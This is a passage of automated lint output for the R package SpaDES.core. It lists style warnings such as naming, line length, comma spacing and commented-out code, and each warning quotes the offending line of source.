{\n^~~~~~~~~~~~~~~\n```\n[R/cache.R:649:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/cache.R#L649) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​makeMemoiseable.simList <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:657:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/cache.R#L657) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​unmakeMemoiseable.simList_ <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/checkpoint.R:36:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/checkpoint.R#L36) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.checkpoint <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​                xAsCall <- .isLastLineSim(x = x, xAsString = bb[seq(funStarts[yy], funEnds[yy + 1])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:90:16:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L90) *style:* **Commented code should be removed.**\n```r\n​              #y = strsplit(bb[funStarts[yy]], split = \"\\\\s+\")[[1]][1]\n               ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:91:53:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L91) *style:* **Commas should always have a space after.**\n```r\n​              y <- paste0(cantCodeCheckMessage, \"'\",bb[funStarts[yy]], \"'\")\n                                                    ^\n```\n[R/code-checking.R:144:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L144) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if (identical(type, \"returnSim\")) { # This is intended for only the last line of a function\n                                      ^\n```\n[R/code-checking.R:182:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L182) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      } else if (identical(x[[1]], quote(`<-`)) ) {\n                                               ^\n```\n[R/code-checking.R:185:62:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L185) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​            if (any(grepl(x[[2]][[2]], pattern = \".envir\"))) {# i.e., sim@.envir\n                                                             ^\n```\n[R/code-checking.R:202:19:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L202) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x <- x[-(1:2)]\n                  ^\n```\n[R/code-checking.R:218:29:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L218) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x[[2]] <- x[[2]][-(1:2)]\n                            ^\n```\n[R/code-checking.R:286:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L286) *style:* **Lines should not be more than 100 characters.**\n```r\n​  allChecks <- list(simAssigns = simAssigns, simGets = simGets, returnsSim = returnsSim, assignToSim = assignToSim, fg = fg)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:319:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L319) *style:* **Lines should not be more than 100 characters.**\n```r\n​    allChecks[anyCantCodeCheck] <- lapply(names(cantCodeCheck[anyCantCodeCheck]), function(objName) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:368:51:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                  ^\n```\n[R/code-checking.R:368:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                       ^\n```\n[R/code-checking.R:384:20:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                   ^\n```\n[R/code-checking.R:384:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                        ^\n```\n[R/code-checking.R:395:90:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L395) *style:* **Commas should always have a space after.**\n```r\n​                                       paste0(paste(missingFrmMod, collapse = \", \"), \" \",verb,\n                                                                                         ^\n```\n[R/code-checking.R:440:75:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L440) *style:* **Commas should always have a space after.**\n```r\n​             \" but only for the 'get' functions, not the 'set' function \",\"\n                                                                          ^\n```\n[R/code-checking.R:454:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L454) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsNotInDotInputObjects[!(simAssignsNotInDotInputObjects %in% outputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:463:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:463:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:464:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                ^\n```\n[R/code-checking.R:464:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                            ^\n```\n[R/code-checking.R:471:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L471) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsInDotInputObjects[!(simAssignsInDotInputObjects %in% inputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:480:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:480:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:481:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:481:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:503:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                       ^\n```\n[R/code-checking.R:503:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                                   ^\n```\n[R/code-checking.R:504:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:504:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:516:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n            ^\n```\n[R/code-checking.R:516:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n                 ^\n```\n[R/code-checking.R:518:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                 ^\n```\n[R/code-checking.R:518:23:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                      ^\n```\n[R/code-checking.R:661:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L661) *style:* **Commented code should be removed.**\n```r\n​    #unique(pd[outerWh, \"line1\"])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:665:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                 ^\n```\n[R/code-checking.R:665:64:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                               ^\n```\n[R/code-checking.R:665:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/code-checking.R#L665) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                                              ^\n```\n[R/copy.R:37:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/copy.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            sim_ <- object\n            ^~~~\n```\n[R/downloadData.R:54:96:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/downloadData.R#L54) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    io <- .parseModulePartial(sim, modules = list(module), defineModuleElement = \"inputObjects\" )\n                                                                                               ^\n```\n[R/downloadData.R:242:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/downloadData.R#L242) *style:* **Commented code should be removed.**\n```r\n​    # parsedModule <- parse(file = file.path(path, module, paste0(module, '.R')))\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:243:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/downloadData.R#L243) *style:* **Commented code should be removed.**\n```r\n​    # urls <- .getSourceURL(pattern = fileToDownload, x = parsedModule)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:250:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/downloadData.R#L250) *style:* **Commented code should be removed.**\n```r\n​      #urls <- moduleMetadata(module, path)$inputObjects$sourceURL\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:262:27:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/downloadData.R#L262) *style:* **Commas should always have a space after.**\n```r\n​    chksums2 <- chksums[0,]\n                          ^\n```\n[R/downloadData.R:263:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/downloadData.R#L263) *style:* **Commented code should be removed.**\n```r\n​    #children <- moduleMetadata(module, path)$childModules\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:266:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n            ^\n```\n[R/downloadData.R:266:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                 ^\n```\n[R/downloadData.R:266:54:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                     ^\n```\n[R/downloadData.R:266:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                       ^\n```\n[R/experiment.R:200:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/experiment.R#L200) *style:* **Commented code should be removed.**\n```r\n​    #sim <- Copy(sim, objects = FALSE, queues = TRUE)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:215:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/experiment.R#L215) *style:* **Commented code should be removed.**\n```r\n​    # cl <- tryCatch(getCluster(), error = function(x) NULL)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:216:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/experiment.R#L216) *style:* **Commented code should be removed.**\n```r\n​    # on.exit(if (!is.null(cl)) returnCluster(), add = TRUE)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:218:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/experiment.R#L218) *style:* **Commented code should be removed.**\n```r\n​    #if (length(modules) == 0) modules <- list(modules(sim)[-(1:4)])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:222:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/experiment.R#L222) *style:* **Commented code should be removed.**\n```r\n​        # unlist(params[paramsTmp], recursive = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:314:58:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/experiment.R#L314) *style:* **Commented code should be removed.**\n```r\n​            params(sim_)[[mod[x]]][[param[[x]]]] <- val #factorialExp[ind,x]\n                                                         ^~~~~~~~~~~~~~~~~~~\n```\n[R/helpers.R:230:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/helpers.R#L230) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​                             paste0(\"package:\", .pkgEnv$corePackagesVec[-(1:2)]))\n                                                                         ^\n```\n[R/helpers.R:260:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/helpers.R#L260) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​all.equal.simList <- function(target, current, ...) {\n^~~~~~~~~~~~~~~~~\n```\n[R/load.R:198:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/load.R#L198) *style:* **Lines should not be more than 100 characters.**\n```r\n​                names(argument) <- c(nam, names(formals(getFromNamespace(loadFun[y], loadPackage[y])))[1])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/misc-methods.R:467:55:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/misc-methods.R#L467) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          (inherits(get(w, envir = envir), \"integer\")) ) {\n                                                      ^\n```\n[R/module-define.R:719:63:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/module-define.R#L719) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      exts <- na.omit(match(file_ext(fl), .fileExts[, \"exts\"]) )\n                                                              ^\n```\n[R/module-dependencies-class.R:53:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/module-dependencies-class.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            out.df <- data.frame(\n            ^~~~~~\n```\n[R/module-dependencies-class.R:172:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/module-dependencies-class.R#L172) *style:* **Commented code should be removed.**\n```r\n​    #   warning(\"input object data.frame should use colnames sourceURL.\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-dependencies-class.R:174:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n        ^\n```\n[R/module-dependencies-class.R:174:78:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n                                                                             ^\n```\n[R/module-dependencies-methods.R:43:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/module-dependencies-methods.R#L43) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- .depsEdgeListMem(deps, plot)\n    ^~\n```\n[R/module-dependencies-methods.R:56:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n  ^~~~~~\n```\n[R/module-dependencies-methods.R:56:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n            ^~~~~~~\n```\n[R/module-dependencies-methods.R:61:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/module-dependencies-methods.R#L61) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.in <- as.data.table(x@inputObjects)[, .(objectName, objectClass)]\n      ^~~~\n```\n[R/module-dependencies-methods.R:62:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/module-dependencies-methods.R#L62) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.out <- as.data.table(x@outputObjects)[, .(objectName, objectClass)]\n      ^~~~~\n```\n[R/module-dependencies-methods.R:65:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/module-dependencies-methods.R#L65) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.in <<- rbindlist(list(sim.in, z.in), use.names = TRUE)\n        ^~~~~~\n```\n[R/module-dependencies-methods.R:68:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/module-dependencies-methods.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.out <<- rbindlist(list(sim.out, z.out), use.names = TRUE)\n        ^~~~~~~\n```\n[R/module-dependencies-methods.R:80:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/module-dependencies-methods.R#L80) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- dx[, list(from = module, to = i.module,\n    ^~\n```\n[R/module-dependencies-methods.R:83:15:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/module-dependencies-methods.R#L83) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (plot) DT <- DT[!duplicated(DT[, 1:2, with = FALSE]), ]\n              ^~\n```\n[R/module-dependencies-methods.R:85:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/module-dependencies-methods.R#L85) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- data.table(from = character(0), to = character(0),\n    ^~\n```\n[R/module-dependencies-methods.R:164:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/module-dependencies-methods.R#L164) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    M <- distances(simGraph, mode = \"out\")\n    ^\n```\n[R/module-dependencies-methods.R:196:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/module-dependencies-methods.R#L196) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​      missingObjects <- simEdgeList %>% filter(from != to) %>%\n                                    ~~^\n```\n[R/module-dependencies-methods.R:210:26:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/module-dependencies-methods.R#L210) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​    return(newEdgeList %>% data.table() %>% setorder(\"from\", \"to\", \"objName\"))\n                       ~~^\n```\n[R/module-dependencies-methods.R:246:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/module-dependencies-methods.R#L246) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​              loadOrder <- names(simGraph[[tsort, ]]) %>% .[!(. %in% \"_INPUT_\" )]\n                                                                              ^\n```\n[R/module-repository.R:28:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/module-repository.R#L28) *style:* **Lines should not be more than 100 characters.**\n```r\n​#'          (\\url{http://spades-core.predictiveecology.org/articles/ii-modules.html#module-directory-structure-modulename}),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:52:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/module-repository.R#L52) *style:* **Lines should not be more than 100 characters.**\n```r\n​    zipFiles <- grep(file.path(name, \"data\"), zipFiles, invert = TRUE, value = TRUE) # remove any zip in data folder\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:293:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/module-repository.R#L293) *style:* **Commented code should be removed.**\n```r\n​      #versionWarning(name, version)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:305:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/module-repository.R#L305) *style:* **Lines should not be more than 100 characters.**\n```r\n​        GET(zip, ua, config = list(config(token = pat)), write_disk(localzip, overwrite = overwrite))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:401:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/module-repository.R#L401) *style:* **Trailing blank lines are 